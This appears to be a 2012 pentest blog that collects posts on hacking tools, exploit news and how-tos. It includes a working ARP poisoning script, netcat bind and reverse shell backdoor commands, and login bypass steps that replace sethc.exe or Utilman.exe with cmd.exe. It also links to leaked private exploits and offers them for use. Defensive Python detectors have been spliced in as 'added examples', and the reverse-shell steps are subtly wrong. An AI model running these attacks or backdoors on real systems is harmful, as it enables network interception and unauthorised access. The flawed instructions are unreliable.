Dec 30, 2012

Chrome Extensions for Pentest

One of the best Chrome extensions: it shows the geolocation, DNS, whois, routing, search results, hosting, domain neighbors, DNSBL, BGP and ASN information of any IP address (IPv4 and IPv6), including a shortcut to your own public IP address. It can be used for whois, network lookup, spam database lookup and more.


Request Maker is an extension that helps during penetration testing: you can easily log, edit and resend HTTP requests. It only captures requests sent via HTML forms and XMLHttpRequests, so it doesn't fill the log with useless entries for images and style sheets.

If you don't want to share your information on the Internet, then Not Sharing My Info is the extension for you: it substitutes an anonymous alias for your details, replacing your real email address with a fake one, and so on.


Simply the best: after information gathering, scanning and enumeration is the second phase of the ethical hacking process, and this extension helps you scan for open ports much like nmap does.

I think there is no need to discuss the importance of proxies and anonymity in the field of hacking. Hide My Ass! operates the most popular browser-based web proxy online, and this is their official extension, which lets you easily redirect your web traffic through their anonymous proxy network.

There are various cookie editors available for Firefox; on Chrome we have Edit This Cookie, which lets you edit any cookie, add cookies, block cookies, delete all cookies and more.


XSS is a web application bug that allows an attacker to inject their own code. If you are doing a penetration test on a web application, XSS Rays will help you perform the test effectively and efficiently. Its core features include an XSS scanner, an XSS reverser and object inspection.


If you want to keep yourself up to date with the latest exploits, shellcode and white papers, this Exploit-DB extension will help you.


Right-click on any link and scan the target with VirusTotal, free and easy: an amazing extension that gives you an online virus scanner.

Source: http://www.ehacking.net/2011/07/chrome-extensions-for-security.html


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 27, 2012

News: W3 Total Cache vulnerability allows hacker to steal password and db info

Jason A. Donenfeld has discovered a critical vulnerability in the popular WordPress plugin "W3 Total Cache". The plugin improves the user experience of your site by improving server performance, caching every aspect of the site.

The cache data is stored in a publicly accessible directory, which means a malicious hacker can browse and download the password hashes and other database information.

He also published a simple shell script to identify and exploit this bug:
http://git.zx2c4.com/w3-total-fail/tree/w3-total-fail.sh

  

Source: http://www.ehackingnews.com/2012/12/w3-total-cache-vulnerability-allows.html


0day grep DoS

If you want the full details of this vulnerability, go to the Source.

$ perl -e 'print "x"x(2**31)' | grep x > /dev/null
 
This checkin adds this text to the NEWS file:

+ grep no longer dumps core on lines whose lengths do not fit in 'int'.
+ (e.g., lines longer than 2 GiB on a typical 64-bit host).
+ Instead, grep either works as expected, or reports an error.
+ An error can occur if not enough main memory is available, or if the
+ GNU C library's regular expression functions cannot handle such long lines.
+ [bug present since "the beginning"] 

Source: http://www.openwall.com/lists/oss-security/2012/12/22/1



Anonymously upload or host files with Anonfiles.com

If you want to upload or host files anonymously, try anonfiles.com :)

Upload your files anonymously and for free on AnonFiles.com. The maximum file size is 500 MB. :)


Source: https://anonfiles.com/ 


Dec 25, 2012

Howto: Perl Script To Look Up a MAC Address Vendor

Sometimes you want to look up which vendor a MAC address belongs to, and there are many online tools for that. But if you want to work offline in BackTrack 4, you can use this script. It was developed by Hawkje.

#!/usr/bin/perl
# MAC address OUI checker
# Thijs (Thice) Bosschert
# http://www.thice.nl
# v0.1 24-06-2010
use strict;
use warnings;

# Print header
print "\n  MAC address OUI checker v0.1\n".
      "  by Thijs (Thice) Bosschert\n\n";

# Check if an argument has been given
if (!defined $ARGV[0] || $ARGV[0] eq '') {
  error();
}

# Remove separators from the MAC address and convert it to uppercase
my $mac = uc $ARGV[0];
$mac =~ s/[:\s-]//g;

# Get the OUI (first three octets) from the MAC
my $OUI;
if ($mac =~ /^([0-9A-F]{6})/) {
  $OUI = $1;
  print "  Checking OUI: $OUI\n";
} else {
  error();
}

# Open the OUI list shipped with aircrack-ng
my $ouifile = "/usr/local/etc/aircrack-ng/airodump-ng-oui.txt";
open(my $fh, '<', $ouifile)
  or die "  Error: could not open $ouifile: $!\n";
while (my $line = <$fh>) {
  chomp $line;
  # Entries look like: 00-11-22   (hex)\t\tVendor name
  my ($checkoui, $company) = split(/\(hex\)/, $line);
  next unless defined $company;
  $checkoui =~ s/[\s-]//g;
  # Check if the OUI can be found in the list
  if ($OUI eq $checkoui) {
    $company =~ s/\t//g;
    # Output found OUI
    print "  Found OUI: $OUI - $company\n\n";
    close($fh);
    exit;
  }
}
close($fh);

# Show if the OUI was not found
print "  Could not find OUI: $OUI\n\n";

# Error message and usage
sub error {
  print "  Error: No MAC address or OUI specified or could not recognize it.\n".
        "    Usage: perl OUI_lookup.pl <MAC/OUI>\n".
        "    MAC can be submitted as:\n".
        "       001122334455\n".
        "       00:11:22:33:44:55\n".
        "       00-11-22-33-44-55\n".
        "    OUI can be submitted as:\n".
        "       001122\n".
        "       00:11:22\n".
        "       00-11-22\n\n";
  exit;
}



Source: http://www.backtrack-linux.org/forums/showthread.php?t=29819

 


Dec 24, 2012

Howto: ARP Poisoning Shell Script By Pentestlab

#!/bin/bash
# Interface the poisoning is sent on
niccard=eth1
# ANSI colour codes are written as \033[...] (the posted copy had lost the backslash-zero)
if [[ $EUID -ne 0 ]]; then
  echo -e "\n\t\t\t\033[1m\033[31m Script must be run as root! \033[0m \n"
  echo -e "\t\t\t Example: sudo $0 \n"
  exit 1
else
  echo -e "\n\033[1;32m#######################################"
  echo -e "# ARP Poison Script #"
  echo -e "#######################################"
  echo -e " \033[1;31mCoded By:\033[0m Travis Phillips"
  echo -e " \033[1;31mDate Released:\033[0m 03/27/2012"
  echo -e " \033[1;31mWebsite:\033[0m http://theunl33t.blogspot.com\n\033[0m"
  echo -n "Please enter target's IP: "
  read victimIP
  echo -n "Please enter Gateway's IP: "
  read gatewayIP
  echo -e "\n\t\t ---===[Time to Pwn]===---\n\n\n"
  echo -e "\t\t--==[Targets]==--"
  echo -e "\t\tTarget: $victimIP"
  echo -e "\t\tGateway: $gatewayIP \n\n"
  echo -e "[*] Enabling IP Forwarding \n"
  echo "1" > /proc/sys/net/ipv4/ip_forward
  echo -e "[*] Starting ARP Poisoning between $victimIP and $gatewayIP! \n"
  xterm -e "arpspoof -i $niccard -t $victimIP $gatewayIP" &
fi
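The script above is the attacker's side. As an added example, not part of the Pentestlab script, here is what the same traffic looks like from the defender's side in Python: parse raw Ethernet/IPv4 ARP replies, remember which MAC each IP last answered from, and flag any reply that moves an already-known IP (here the gateway) to a different MAC, which is exactly what the forged replies from arpspoof do (arpwatch applies the same idea). The frames, MACs and addresses are constructed inline rather than captured, and reading frames from a live interface or a pcap is assumed to happen elsewhere.

```python
import socket
import struct

# Ethernet II header: dst MAC, src MAC, EtherType
ETH_HDR = struct.Struct("!6s6sH")
# ARP body for Ethernet/IPv4: htype, ptype, hlen, plen, oper, sha, spa, tha, tpa
ARP_HDR = struct.Struct("!HHBBH6s4s6s4s")
ETHERTYPE_ARP = 0x0806
ARP_REPLY = 2


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_arp_reply(frame):
    """Return (sender_ip, sender_mac) for an Ethernet/IPv4 ARP reply, else None."""
    if len(frame) < ETH_HDR.size + ARP_HDR.size:
        return None
    _dst, _src, ethertype = ETH_HDR.unpack_from(frame, 0)
    if ethertype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, oper, sha, spa, _tha, _tpa = ARP_HDR.unpack_from(frame, ETH_HDR.size)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4) or oper != ARP_REPLY:
        return None
    return socket.inet_ntoa(spa), mac_str(sha)


class ArpWatch:
    """Remember which MAC each IP has answered from; flag any reply that changes it."""

    def __init__(self, trusted=None):
        # Seed with known-good bindings, e.g. the gateway's real MAC learned on a quiet network.
        self.table = dict(trusted or {})
        self.alerts = []

    def observe(self, frame):
        """Feed one frame; returns (ip, old_mac, new_mac) on a conflict, else None."""
        parsed = parse_arp_reply(frame)
        if parsed is None:
            return None
        ip, mac = parsed
        known = self.table.get(ip)
        if known is not None and known != mac:
            alert = (ip, known, mac)
            self.alerts.append(alert)   # keep the first binding; do not learn the new one
            return alert
        self.table[ip] = mac
        return None


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Constructed ARP reply frame used as sample input; not a real capture."""
    sha = bytes.fromhex(sender_mac.replace(":", ""))
    tha = bytes.fromhex(target_mac.replace(":", ""))
    spa, tpa = socket.inet_aton(sender_ip), socket.inet_aton(target_ip)
    return ETH_HDR.pack(tha, sha, ETHERTYPE_ARP) + ARP_HDR.pack(
        1, 0x0800, 6, 4, ARP_REPLY, sha, spa, tha, tpa)


def run_demo():
    """Constructed scenario: genuine gateway reply, then a forged one, then an unrelated host."""
    gateway_ip, gateway_mac = "192.168.1.1", "00:11:22:33:44:55"
    victim_mac, rogue_mac = "66:77:88:99:aa:bb", "de:ad:be:ef:00:01"
    watch = ArpWatch(trusted={gateway_ip: gateway_mac})
    frames = [
        build_arp_reply(gateway_mac, gateway_ip, victim_mac, "192.168.1.50"),           # genuine
        build_arp_reply(rogue_mac, gateway_ip, victim_mac, "192.168.1.50"),             # forged
        build_arp_reply("00:aa:bb:cc:dd:ee", "192.168.1.60", victim_mac, "192.168.1.50"),  # new host
        b"\x00" * 20,                                                                   # not ARP
    ]
    results = [watch.observe(f) for f in frames]
    return results, watch.alerts


if __name__ == "__main__":
    print(run_demo()[1])
```

The watcher deliberately keeps the first binding it saw rather than learning the new one, so a second forged reply for the same IP still raises an alert; seeding it with the gateway's real MAC is what turns "the mapping changed" into "the gateway is being impersonated".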



Source: http://pentestlab.wordpress.com/2012/12/22/arp-poisoning-script/ 


Howto: Benchmark your web server with ApacheBench (ab)

1. ApacheBench
ab -k -n 50000 -c 200 -g gnuplot-output.txt http://target_ip
-k keep-alive (multiple requests within one HTTP session)
-n number of requests to perform
-c number of requests to perform at a time (concurrency)
-g write per-request timing data to a gnuplot-readable file

2. Create the PNG file to display the benchmark
$ gnuplot configfile

Example configfile
# output as png image
set terminal png

# save file to "benchmark.png"
set output "benchmark.png"

# graph a title
set title "ab -k -n 50000 -c 200"

# nicer aspect ratio for image size
set size 1,0.7

# y-axis grid
set grid y

# x-axis label
set xlabel "request"

# y-axis label
set ylabel "response time (ms)"

# plot column 9 (ttime, the total time per request) from the -g output of two runs, "server1.txt" and "server2.txt", as smooth sbezier lines
plot "server1.txt" using 9 smooth sbezier with lines title "server1:", \
     "server2.txt" using 9 smooth sbezier with lines title "server2:"
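The `using 9` in the plot above works because the starttime stamp that `ab -g` writes occupies five whitespace-separated fields, so column 9 is ttime (total time per request, in milliseconds). As an added example, not from the source article, the Python below parses the tab-separated `-g` file directly and reports the mean, nearest-rank percentiles and the slowest requests, the outliers that a smoothed bezier curve hides. The sample rows are constructed to match the `ab -g` layout; they are not a real benchmark run.

```python
import math

# Whitespace-split column numbers as gnuplot sees them: the ctime-style starttime
# stamp ("Tue Dec 18 10:00:00 2012") takes five fields, so ttime is column 9.
GNUPLOT_COLUMN = {"ctime": 7, "dtime": 8, "ttime": 9, "wait": 10}

# Constructed sample in the layout `ab -g` writes: a header line, then one
# tab-separated row per request; ctime/dtime/ttime/wait are milliseconds.
SAMPLE_AB_OUTPUT = "\n".join([
    "starttime\tseconds\tctime\tdtime\tttime\twait",
    "Tue Dec 18 10:00:00 2012\t1355824800\t0\t3\t3\t3",
    "Tue Dec 18 10:00:00 2012\t1355824800\t1\t11\t12\t10",
    "Tue Dec 18 10:00:00 2012\t1355824800\t0\t4\t4\t4",
    "Tue Dec 18 10:00:01 2012\t1355824801\t0\t45\t45\t44",
    "Tue Dec 18 10:00:01 2012\t1355824801\t0\t5\t5\t5",
    "Tue Dec 18 10:00:01 2012\t1355824801\t1\t7\t8\t6",
    "Tue Dec 18 10:00:01 2012\t1355824801\t0\t4\t4\t4",
    "Tue Dec 18 10:00:02 2012\t1355824802\t0\t20\t20\t19",
    "Tue Dec 18 10:00:02 2012\t1355824802\t0\t6\t6\t5",
    "Tue Dec 18 10:00:02 2012\t1355824802\t0\t5\t5\t5",
])

AB_HEADER = ["starttime", "seconds", "ctime", "dtime", "ttime", "wait"]


def parse_ab_gnuplot(text):
    """Parse `ab -g` output into a list of dicts with integer timing fields."""
    lines = [line for line in text.splitlines() if line.strip()]
    if not lines or lines[0].split("\t") != AB_HEADER:
        raise ValueError("not an ab -g file: header missing or unexpected")
    rows = []
    for line in lines[1:]:
        fields = line.split("\t")
        if len(fields) != len(AB_HEADER):
            raise ValueError(f"malformed row: {line!r}")
        rows.append({
            "starttime": fields[0], "seconds": int(fields[1]),
            "ctime": int(fields[2]), "dtime": int(fields[3]),
            "ttime": int(fields[4]), "wait": int(fields[5]),
        })
    return rows


def percentile(values, p):
    """Nearest-rank percentile (p in 0..100) of a non-empty list."""
    if not values:
        raise ValueError("no values")
    ordered = sorted(values)
    rank = max(1, math.ceil(p * len(ordered) / 100))
    return ordered[rank - 1]


def summarize(text, column="ttime"):
    """Summary statistics for one timing column; defaults to ttime like the plot above."""
    rows = parse_ab_gnuplot(text)
    if not rows:
        raise ValueError("no requests recorded")
    values = [row[column] for row in rows]
    return {
        "requests": len(values),
        "mean_ms": sum(values) / len(values),
        "p50_ms": percentile(values, 50),
        "p90_ms": percentile(values, 90),
        "p99_ms": percentile(values, 99),
        "max_ms": max(values),
    }


def slowest(text, n=3, column="ttime"):
    """The n largest values of a column, largest first."""
    values = [row[column] for row in parse_ab_gnuplot(text)]
    return sorted(values, reverse=True)[:n]


if __name__ == "__main__":
    print(summarize(SAMPLE_AB_OUTPUT))
    print(slowest(SAMPLE_AB_OUTPUT))
```

Comparing two servers by p99 and max rather than by the smoothed curve is what tells you whether a tail of slow requests (a saturated worker pool, a GC pause, a rate limiter kicking in under the 200 concurrent connections) is hiding behind a healthy-looking average.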


Source: http://www.kutukupret.com/2011/05/10/graphing-apachebench-results-using-gnuplot/


Dec 20, 2012

Howto: Reset Mac admin password

Here's how to reset your OS X password without an OS X CD.
The working solution for me was to create a new admin account;
you can create a new admin like this by deleting a specific file.

You need to enter the terminal and create a new admin account:

1. Reboot
2. Hold the Apple key + S key down after you hear the chime.
(Command + S keys on newer Macs)
3. When you get a text prompt, enter these terminal commands to create a brand new admin account (hitting return after each line):

mount -uw /
rm /var/db/.AppleSetupDone
shutdown -h now

4. After rebooting you should have a brand new admin account. It takes you through a quick setup, and once in you can do whatever you like to any account, including resetting passwords.


Source:  http://top-hat-sec.com/forum/index.php?topic=1924.0


Dec 19, 2012

Havij Source Code Was Leaked

Some time ago a Chinese hacker disclosed this source code, so it is now public. If you want to download it, go to the Source.


Source: http://www.garage4hackers.com/f11/havij-source-code-3161.html


Private Exploits Leaked From 1337day.com By Anonymous

Try them at your own risk.

[*] Google Market bug for Android 4.1.1 => 4.2 Jelly Bean Remote Target Download PoC
http://www.anonpaste.me/anonpaste2/index.php?a503d1b278bb225b#gCHxh6VzmlSQ5eMjWIC4ZRbu7lYs9E3mhA4Lu+RA2og=
[*] Snort Multiple HTTP Bypass <= 2.9.3.1 Exploit
http://www.anonpaste.me/anonpaste2/index.php?2846e235bb6f371b#7TWSQU7Bd2YV0ZGW6FKLMyW6sW7KKKUBjbsNKS7oH6c=
[*] Blackberry Bluetooth Crash POC (OBEX PUSH)
http://www.anonpaste.me/anonpaste2/index.php?5477a5629400b644#RR8gAYFbjptbgHRBSt5zMqRheCjyrKidKCRj/6/FrO4=
[*] Mozilla FireFox 17.0 Memory Corruption p0c
http://www.anonpaste.me/anonpaste2/index.php?c825a678e8919146#WAF5uSQto3pwsgwicySrOa6NLqWty/6qZTXlAf0raUE=
[*] vBulletin 4.2.0 Full Path Disclosure Vulnerability
http://www.anonpaste.me/anonpaste2/index.php?90b1648734cf8e34#OkWI8LDN+ql742lTjl5e052v21JB2vGASCaMcf5KONg=
[*] Wordpress 3.4.2 Full Path Disclosure Vulnerability
http://www.anonpaste.me/anonpaste2/index.php?1186993d410babb8#5oESnTDSiDz4TovKrnqOAP1dsb6hjy67ylM5X422uUo=
[*] vBulletin 4.x/5.x multiple Full Path Disclosure Vulnerability
http://www.anonpaste.me/anonpaste2/index.php?e5768a52f2d79da3#jUIiiWXcXPvQY9kQa88ojumqzVb/C9oeSnoBP1RERLw=
[*] RealPlayer .html v15.0.6.14 Memory Corruption and Overflow POC
http://www.anonpaste.me/anonpaste2/index.php?1721b55fa578ccec#JsRAVDh2ukfmUukd6+c7iw0eiCAF26BnCX5GsmCg06k=
[*] IPBoard 3.x.x/3.4 Full Path Disclosure
http://www.anonpaste.me/anonpaste2/index.php?c64f91681ad35dee#r2qAofLijiGmoXid9At5HtMNkNiz7Xa8Oyu7yEfTXhQ=
[*] Steam Linux Closed Beta bypass authorization
http://www.anonpaste.me/anonpaste2/index.php?d391a81cbe3ed734#wowS3PnS1qfNvVAeGoY8gU49PSu92Y6B3ihSPWNlJMo=
[*] WordPress 3.5 multiple path disclosure vulnerabilities
http://www.anonpaste.me/anonpaste2/index.php?7e0c2c2220e10f1e#pdmUOxmiqOk2YrPklsywJxg5aKJoX0+c6eDxqVqyKWE=
[*] Joomla v1.5.x Error Based SQL Injection Vulnerability
http://www.anonpaste.me/anonpaste2/index.php?cc82dfaac7fad370#QPlKayTowzYtEFtxjsWDa2ydKLvM4062g6R58Y8xfR8=

 
Source: http://www.kernelmode.info/forum/viewtopic.php?f=13&t=2244


Dec 17, 2012

ScanPlanner - Scanning with NMAP Online

ScanPlanner is the easiest, fastest way to run NMAP scans and tests from the web. Schedule and track your network scans and vulnerability tests with our intuitive online interface.



Source: http://scanplanner.com/


SQLI-LABS - Learning platform for your SQL injection skills

SQLI-LABS is a platform to learn SQLi.
The following labs are covered for GET and POST scenarios:

1. Error Based Injections (Union Select)
 1. String
 2. Integer
2. Error Based Injections (Double Injection Based)
3. BLIND Injections:
 1. Boolean Based
 2. Time Based
4. Update Query Injection.
5. Insert Query Injections.
6. Header Injections.
 1. Referer based.
 2. UserAgent based.
 3. Cookie based.
7. Second Order Injections
 
Source: https://github.com/Audi-1/sqli-labs 



Dec 14, 2012

Howto: Reset a forgotten Windows 7 password

This post just summarises the steps from the Source; if you want to see a picture of each step, go to the Source.

1. Create the System Repair Disk (Start button -> All Programs -> Maintenance -> Create a System Repair Disk)

2. Reboot and load the System Repair Disk

3. In the menu, after choosing the disk, click Command Prompt

4. copy c:\windows\system32\sethc.exe c:

5. copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

6. Reboot and wait at the login screen

7. Hit the Shift key 5 times and you will get a command prompt

8. Type the command "net user username password"

9. Now you can log in with your new password

10. To put the original executable back afterwards, use
copy c:\sethc.exe c:\windows\system32\sethc.exe


Source: http://reboot.pro/topic/15751-reset-a-forgotten-windows-7-password-without-using-any-third-party-software-how-to-tutorial/ 


Howto: Reset a forgotten Windows 8 Password

This post just summarises the steps from the Source; if you want to see a picture of each step, go to the Source.

1. Make a System Rescue CD (go to Control Panel, open Windows 7 File Recovery, choose "Create a System Recovery Disk" at the top left of the next screen, and follow the on-screen instructions to make the CD.)

2. Reboot Windows and boot from your System Rescue CD.

3. Once in the System Rescue CD, choose Troubleshoot -> Advanced options -> Command Prompt

4. In the command prompt, run 'diskpart'

5. In diskpart, run 'list vol'

6. Locate the Windows partition; normally it will be C

7. Return to the command prompt with the exit command

8. Type C: -> cd windows/system32/

9. Replace cmd.exe with Utilman.exe: del Utilman.exe -> ren cmd.exe Utilman.exe (You should back up each file before replacing it.)

10. Restart with "shutdown -r -t 00"

11. After the restart, click "Ease Of Access Center" in the left corner of the login screen.

12. Now you get a Command Prompt.

13. Type "net user" to list the users on the PC.

14. Type "net user administrator *" to change the administrator password; you can replace administrator with whichever user's password you want to change.

15. Change the password

16. Exit to the login screen and use your new password to log into Windows 8

17. To roll back the changes made earlier, use:
 17.1 Type: c:
 17.2 Type: cd /windows/system32/
 17.3 Type: del Utilman.exe
 17.4 Type: ren Utilman.exe.original Utilman.exe
 17.5 Type: ren cmd.exe.original cmd.exe
 17.6 Type: shutdown -r -t 00
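Both walkthroughs above (Windows 7 and Windows 8) work by swapping an accessibility helper that the logon screen launches as SYSTEM (sethc.exe, Utilman.exe) for cmd.exe. As an added example, not from either reboot.pro post, here is a Python check a defender can run over a System32 directory to catch that: it hashes cmd.exe and reports any accessibility binary whose contents are identical, plus any *.original backup left behind by the rename steps. The demo builds a fake System32 in a temporary directory with made-up file contents; on a real host you would point it at C:\Windows\System32, and it assumes cmd.exe itself is genuine.

```python
import hashlib
import tempfile
from pathlib import Path

# Accessibility helpers the logon screen can launch as SYSTEM before anyone logs in.
# Replacing any of them with cmd.exe is the trick both posts above rely on.
ACCESSIBILITY_BINARIES = [
    "sethc.exe", "Utilman.exe", "osk.exe", "Narrator.exe",
    "Magnify.exe", "DisplaySwitch.exe", "AtBroker.exe",
]


def sha256_of(path):
    """SHA-256 of a file, read in chunks so large binaries are fine."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_swapped_accessibility_binaries(system32):
    """Report accessibility binaries byte-identical to cmd.exe and stray *.original backups.

    Assumes cmd.exe itself is genuine: a swapped helper is a copy of it, so hash
    equality is the check. Returns {"replaced": [...], "backups": [...]}.
    """
    system32 = Path(system32)
    cmd = system32 / "cmd.exe"
    if not cmd.is_file():
        raise FileNotFoundError(f"no cmd.exe in {system32}")
    cmd_hash = sha256_of(cmd)
    replaced = [
        name for name in ACCESSIBILITY_BINARIES
        if (system32 / name).is_file() and sha256_of(system32 / name) == cmd_hash
    ]
    backups = sorted(p.name for p in system32.glob("*.original"))
    return {"replaced": replaced, "backups": backups}


def build_sample_system32(root):
    """Constructed stand-in for System32: made-up contents, one helper swapped."""
    root = Path(root)
    root.mkdir(parents=True, exist_ok=True)
    (root / "cmd.exe").write_bytes(b"MZ fake cmd.exe")
    (root / "sethc.exe").write_bytes(b"MZ fake cmd.exe")                 # swapped, as in the Windows 7 steps
    (root / "Utilman.exe").write_bytes(b"MZ fake utilman.exe")           # genuine
    (root / "osk.exe").write_bytes(b"MZ fake osk.exe")                   # genuine
    (root / "Utilman.exe.original").write_bytes(b"MZ fake utilman.exe")  # backup left behind
    return root


def run_demo():
    """Build the fake directory in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        return find_swapped_accessibility_binaries(build_sample_system32(Path(tmp) / "System32"))


if __name__ == "__main__":
    print(run_demo())
```

Hash equality with cmd.exe is a narrow, zero-false-positive test for exactly the swap these posts describe; a fuller baseline would compare each helper against the copy Windows keeps under WinSxS or verify its Authenticode signature, which is outside this example.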

Source: http://reboot.pro/topic/17872-reset-a-windows-8-password-without-using-any-third-party-software/
     

   


Dec 13, 2012

Howto: Netcat: TCP/IP Swiss Army Knife

Port Scanning: The act of systematically scanning a host for open ports. Once determined, these open ports can be utilized to gain access to the host or to launch an attack.
Banner Grabbing: A fingerprinting technique aimed at extracting information about a host such as the operating system, web server, applications etc. A simple form of banner grabbing is to send a request and analyze the response received.
Port Redirection: A simple technique used to transfer traffic from one port to another. It is utilized to access services which are restricted in a specific environment.
Honeypot: A honeypot is a monitored decoy used to draw attackers away from critical resources, and also a tool to analyze an attacker's methods and characteristics. It can emulate various services provided by an OS and generate responses for those services. It provides an environment that can interact with an attacker and monitor his/her activities without any real resources at risk.

First of all, let's see all the options provided by Netcat:
root@bt:~# nc -h
[v1.10-38]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-c shell commands as `-e'; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-b allow broadcasts
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-k set keepalive option on socket
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-q secs quit after EOF on stdin and delay of secs
-s addr local source address
-T tos set Type Of Service
-t -t answer TELNET negotiation
-u UDP mode
-v -v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').


1. Client-Server
1.1. Server
 nc -l -p 9999
1.2. Client
 nc server_ip 9999

2. Port Scanning
nc -v -w 2 -z target_ip 1-204

3. Banner Grabbing
nc -vv target_ip 80

4. Port Forwarding
nc -l -p listen_port -c "nc destination destination_port"

5. File Transfer
5.1 Server
nc -lv -p 9999 > save.file
5.2 Client
nc target_ip 9999 < target.file

6. Honeypot
For this we need to set up Netcat in listen mode on a specific port and send a user-defined output to the incoming connection.
nc -lvvp 443 < apache2.txt
nc target_ip 443

7. Backdoor
Bind Shell
7.1 Victim
nc -lvvp 9999 -e cmd.exe
7.2 Hacker
nc -v victim_ip 9999

Reverse Shell
7.1 Victim
nc -lvvp 9999
7.2 Hacker
nc -v victim_ip 9999 -e /bin/bash
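To show what the banner-grabbing (3) and honeypot (6) commands above actually exchange on the wire, here is an added Python example, not from the InfoSec Institute article, that runs both ends on localhost: a listener that, like `nc -lvvp 443 < apache2.txt`, answers every connection with a canned banner and logs what the client sent first, and a client that, like `nc -vv target_ip 80`, sends a probe and reads the reply. The fake Apache banner and the probe are constructed, and the listener port is chosen by the OS so the demo does not need a free well-known port.

```python
import socket
import threading

# Constructed canned banner: stands in for the apache2.txt the post feeds to nc.
FAKE_BANNER = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Apache/2.2.22 (Debian)\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)


class BannerHoneypot:
    """Listen on one port, record what each client sends, answer with a canned banner."""

    def __init__(self, banner, host="127.0.0.1", port=0):
        self.banner = banner
        self.log = []  # (peer_address, first bytes received) per connection
        self._stop = threading.Event()
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))      # port 0: let the OS pick a free port
        self.sock.listen(5)
        self.sock.settimeout(0.2)         # so the accept loop can notice stop()
        self.port = self.sock.getsockname()[1]
        self._thread = threading.Thread(target=self._serve, daemon=True)
        self._thread.start()

    def _serve(self):
        while not self._stop.is_set():
            try:
                conn, peer = self.sock.accept()
            except socket.timeout:
                continue
            except OSError:
                return
            with conn:
                conn.settimeout(2)
                try:
                    data = conn.recv(1024)   # whatever the scanner sends first, if anything
                except socket.timeout:
                    data = b""
                self.log.append((peer, data))
                conn.sendall(self.banner)

    def stop(self):
        self._stop.set()
        self._thread.join()
        self.sock.close()


def grab_banner(host, port, probe=b"HEAD / HTTP/1.0\r\n\r\n", timeout=2):
    """Client side of `nc -vv host port`: send a probe and return everything received."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(probe)
        while True:
            try:
                data = s.recv(4096)
            except socket.timeout:
                break
            if not data:          # listener closed the connection
                break
            chunks.append(data)
    return b"".join(chunks)


def server_header(banner):
    """Pull the Server: value out of an HTTP banner, or None if absent."""
    for line in banner.split(b"\r\n"):
        if line.lower().startswith(b"server:"):
            return line.split(b":", 1)[1].strip().decode(errors="replace")
    return None


def run_demo():
    """Run both sides on localhost; return the client's view and the honeypot's log."""
    honeypot = BannerHoneypot(FAKE_BANNER)
    try:
        reply = grab_banner("127.0.0.1", honeypot.port)
    finally:
        honeypot.stop()
    return {
        "server": server_header(reply),
        "connections": len(honeypot.log),
        "probe_seen": honeypot.log[0][1] if honeypot.log else b"",
    }


if __name__ == "__main__":
    print(run_demo())
```

The listener logs the first bytes before it answers, which is the useful part of a honeypot: the canned banner only has to look plausible, while the recorded probes show which tools and requests are hitting the port.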


Source: http://resources.infosecinstitute.com/netcat-tcpip-swiss-army-knife/



Dec 12, 2012

Topera - TCP Port Scanner IPV6

Topera is a brand new TCP port scanner under IPv6, with the particularity that these scans are not detected by Snort.  

Source: http://code.google.com/p/topera/


Interesting Exploit in 2012-12-12

1. Snare Agent Linux Password Disclosure / CSRF Vulnerabilities
http://1337day.com/exploit/19941

2. Smartphone Pentest Framework 0.1.3 / 0.1.4 Command Injection
http://1337day.com/exploit/19942

3. Nagios Core 3.4.3 Buffer Overflow Vulnerability
http://1337day.com/exploit/19943

4. WordPress 3.5 multiple path disclosure vulnerabilities
http://1337day.com/exploits/19944

5. Microsoft windows remote desktop PoC C# Exploit
http://1337day.com/exploit/19946

6. WordPress ABC Test Plugin 0.1 Cross Site Script XSS
http://1337day.com/exploit/19947

7. WordPress ABC Test Plugin directory traversal
http://1337day.com/exploit/19948







WiFi Monitor Mode with Android PCAP Capture

Required:
- Android device which supports USB host mode (such as the Galaxy Nexus or Nexus 7)

- Wireless USB adapter with an RTL8187 chipset.


1. Install "Android PCAP Capture", created by Mike "dragorn" Kershaw.

2. Connect the wireless USB adapter to the Android device through a USB On-The-Go cable.

3. Open Android PCAP Capture and start capturing traffic with your wireless USB adapter.

4. Transfer the pcap file to your PC to analyse it.


Source: http://www.thepowerbase.com/2012/12/wifi-monitor-mode-with-android-pcap-capture/



HoneyProxy - Proxy to analyse HTTP(S) traffic


Features

  • Analyze HTTP(S) traffic on the fly
  • Filter and highlight traffic, regex support included.
  • Save HTTP conversations for later analysis
  • Make scripted changes with Python, e.g. remove Cache Header.
  • based on and compatible to mitmproxy.
  • cross-platform (Windows, OSX and Linux)
  • SSL interception certs generated on the fly 
Source: http://honeyproxy.org/


Dec 10, 2012

Zeroday Of Authentication bypass FreeSSHD / FreeFTPD

Authentication bypass FreeSSHD / FreeFTPD
Posted on: December 9, 2012
Source: BUGTRAQ
SecurityVulns ID: 12755
Type: remote
Danger: 6/10
Description: Completion of the authorization is not checked when initiating client ssh session
Affected: WeOnlyDo : FreeSSHd 1/2
  WeOnlyDo : FreeFTPD 03/02
Files: FreeSSHD all version Remote Authentication Bypass ZERODAY

FreeFTPD all versions Remote System Level Exploit Zero-Day

Source: http://securityvulns.ru/news/FreeSSHD/AB.html


